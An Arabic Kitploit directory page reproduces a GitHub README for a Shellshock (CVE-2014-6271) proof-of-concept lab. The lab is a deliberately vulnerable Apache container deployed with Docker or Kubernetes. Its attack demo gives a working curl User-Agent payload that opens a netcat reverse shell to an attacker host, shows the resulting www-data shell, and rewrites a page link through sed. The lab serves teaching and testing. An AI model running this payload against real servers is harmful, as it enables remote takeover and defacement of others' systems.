Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2014-6271-Apache-Debian — هذا المستودع هو بيئة PoC لـ CVE-2014-6271 (https://nvd.nist.gov/vuln/detail/cve-2014-6271). | Kitploit
أدوات/GitHubGitHub/mochizuki875/cve-2014-6271-apache-debian
أمن الحاوياتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليممختبرات وتدريب عملي
GitHubmochizuki875/cve-2014-6271-apache-debian

CVE-2014-6271-Apache-Debian

هذا المستودع هو بيئة PoC لـ CVE-2014-6271 (https://nvd.nist.gov/vuln/detail/cve-2014-6271).

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
12منذ 4 سنواتلم تتم المراجعة بعد

CVE-2014-6271-Apache-Debian

نظرة عامة

هذا المستودع هو بيئة إثبات المفهوم (PoC) لـ CVE-2014-6271.
يمكنك نشر خدمة ويب تحتوي على الثغرة باستخدام صورة حاوية apache2.

التحضير

بناء الصورة

بناء الصورة غير الآمنة من Dockerfile.

root@kitploit:~
# docker build -t cve-2014-6271-apache-debian:buster ./insecure-base-image/
# docker build -t training-website-poc:v1.0 ./web-insecure/

نشر حاوية PoC

Docker

نشر حاوية PoC كحاوية docker.

root@kitploit:~
# docker run -d -p 8080:80 training-website-poc:v1.0

Kubernetes

نشر حاوية PoC كـ pod و service في k8s.

root@kitploit:~
# kubectl apply -f web-insecure/k8s-manifest/web-insecure-pod.yml
# kubectl apply -f web-insecure/k8s-manifest/web-insecure-svc.yml

الوصول إلى خدمة ويب PoC

بعد اكتمال النشر، يمكنك تصفح صفحة الويب عن طريق الوصول إلى عنوان URL التالي باستخدام المتصفح.
يمكنك الوصول إلى بيئة مختبر k8s عن طريق النقر على الرابط "Click!" الموجود أسفل صفحة الويب.

Docker

root@kitploit:~
http://<docker host IP>:8080

Kubernetes

root@kitploit:~
http://<k8s service endpoint>:<k8s service port>

عرض الهجوم

في هذا العرض، يمكنك تغيير صفحة الويب من مضيف المهاجم (خارج الحاوية) مستغلاً ثغرة CVE-2014-6271.

نفذ هذه الأوامر من مضيف المهاجم.

الطرفية 1

root@kitploit:~
# nc -nvlp 5050

الطرفية 2
※في هذه الحالة، ننشر حاوية PoC باستخدام Docker. في حالة Kubernetes، يجب أن يكون عنوان URL هو http://<k8s service endpoint>:<k8s service port>.

root@kitploit:~
# curl -H "user-agent: () { :; }; echo; /bin/nc -e /bin/bash <Attacker Host IP> 5050" http://<docker host IP>:8080/cgi-bin/vulnerable

بعد ذلك، يمكنك رؤية أنه يمكن تنفيذ /bin/bash لحاوية PoC في الطرفية 1.

root@kitploit:~
Listening on 0.0.0.0 5050
Connection received on 172.17.0.2 38926
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),1000(wheel)
pwd
/usr/lib/cgi-bin

قم بتغيير الرابط "Click!" في صفحة الويب.
في هذه الحالة، نستخدم صفحة وهمية للرابط الضار.

root@kitploit:~
sudo sed -i -e 's/https\:\/\/www.katacoda.com\/courses\/kubernetes/danger.html/' /var/www/html/index.html

قم بالوصول إلى صفحة الويب مرة أخرى وانقر على الرابط "Click!" الموجود أسفل صفحة الويب.

root@kitploit:~
http://<docker host IP>:8080

المراجع

https://github.com/hmlio/vaas-cve-2014-6271
https://github.com/opsxcq/exploit-CVE-2014-6271

تنزيل الأداة